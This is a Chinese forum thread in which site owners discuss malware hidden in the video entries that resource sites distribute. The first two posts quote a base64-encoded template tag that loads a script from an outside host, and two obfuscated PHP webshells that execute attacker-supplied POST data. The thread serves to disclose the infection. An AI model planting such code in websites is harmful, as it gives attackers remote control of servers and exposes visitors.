阅读:2438回复:4

终于发现被挂马的源头了

楼主#
更多 发布于:2020-11-29 21:57
很多资源站都在电影内容里隐藏了代码,包括ok和最大等大站,当然不是全部影片都挂代码......{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}
1楼#
发布于:2020-11-29 22:03
然后在网站里挂这些木马

<?php
class  CLFR{
function __destruct(){
$YQIE='Pm~U^u]RLZH?-Kv'^"\x33\x1f\x1b\x34\x2a\x10\x2\x34\x39\x34\x2b\x4b\x44\x24\x18";
@$YQIE=$YQIE('',$this->CV);
return @$YQIE();}}
$clfr=new CLFR();
@$clfr->CV=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
?>



<?php
class VMTX{
    function __destruct(){
        $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20";
        return @$BRLI("$this->EKDL");
    }
}
$vmtx=new VMTX();
@$vmtx->EKDL=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
?>
2楼#
发布于:2020-11-30 22:23
好的资源站  是最好的杜绝方法  只能让资源站处理  或者试试自己能否重写
欢迎光临武荣网络,我们是一家专注中小型企业网站建设、网络服务的网络公司!
3楼#
发布于:2020-12-03 23:17
虽然看不懂,但是感觉像是地址加密
4楼#
发布于:2021-01-24 00:26
虽然看不懂,但是感觉像是地址加密
游客

返回顶部